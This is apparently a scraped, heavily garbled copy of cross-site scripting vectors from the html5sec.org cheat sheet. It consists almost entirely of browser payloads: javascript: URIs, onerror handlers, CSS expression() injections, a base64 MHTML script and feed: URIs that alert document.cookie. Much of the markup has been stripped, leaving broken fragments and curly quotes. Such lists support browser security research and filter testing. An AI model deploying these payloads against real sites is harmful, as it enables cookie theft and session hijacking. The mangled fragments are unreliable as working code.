//http://html5sec.org/
…
CLICK // window.opener will be null
// window.opener will be null
CLICK // window.opener still works
// window.opener still works
// window.opener still works
CLICKME// window.opener still works
<iframe srcdoc="
<a href="javascript:'CLICK
<!–
<img src="
<img src="
XXX
alert(1)
<b alert(1)//0
document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;
// O10.10↓, OM10.0↓, GC6↓, FF
// IE6, O10.10↓, OM10.0↓
// IE6, O11.01↓, OM10.1↓
class XSS {public static function main() {
flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);
}}
[A]
alert(1)”>
alert(1)”>
alert(1)”>
[B]
alert(1)’>”>
[C]
alert(1)”>
[D]
alert(1)”>
some content without two new line \n\n
Content-Type: multipart/related; boundary=”******”some content without two new line
–******
Content-Location: xss.html
Content-Transfer-Encoding: base64
PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
–******–
d.innerHTML+=”;
d.innerHTML+=”;
<img src="x` `alert(1)”` `>
“>
<!–[if –>
// Safari 5.0, Chrome 9, 10
// Safari 5.0
<!– `
<%
x='<%'
%>/
alert(2)
XXX
*[‘<!–']{}
–>{}
*{color:red}
X
p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};
<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
@import “data:,*%7bx:expression(write(1))%7D”;
XXXYXXXZ
*[{}@import’test.css?]{color: green;}X
{-o-link:’javascript:alert(1)’;-o-link-source: current;}
*{x:expression(write(1))}
with(document.getElementById(“d”))innerHTML=innerHTML
XXX
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
<!–*{color:red} /* all UA */
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
#x{font-family:foo[bar;color:green;}
#y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=1}}).$=alert
({0:#0=alert/#0#/#0#(0)})
ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()
history.pushState(0,0,’/i/am/somewhere_else’);
alert`1`;
var something = `abc${alert(1)}def`;
“.constructor.constructor`alert\`1\““;
{alert(1)};1
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
<script<alert(1)</script
<script</script
0?Worker(“#”).onmessage=function(_)eval(_.data) :postMessage(importScripts(‘data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk’))
crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)
[{‘a’:Object.prototype.__defineSetter__(‘b’,function(){alert(arguments[0])}),’b’:[‘secret’]}]
@font-face {font-family: y; src: url(“font.svg#x”) format(“svg”);} body {font: 100px “y”;}
Hello
alert(1)
alert(1)
<!DOCTYPE doc [
]>
alert(1)
<img/src=x onerror=alert(1)//
<image style='filter:url("data:image/svg+xml,parent.alert(1)”)’>
<!–
Same effect with
–>
alert`1`
alert`1`
alert(1)
<!DOCTYPE x[]>&x;
alert(1)
<!DOCTYPE x [
]>
XXX
¼script ¾alert(1)//¼/script ¾
drag and drop one of the following strings to the drop box:
jAvascript:alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie);//
feed:javascript:alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie);//
feed:data:text/html,<script>alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie)</script><b>
feed:feed:javAscript:javAscript:feed:alert(‘Top Page Location: ‘+document.location+’ Host Page Cookies: ‘+document.cookie);//
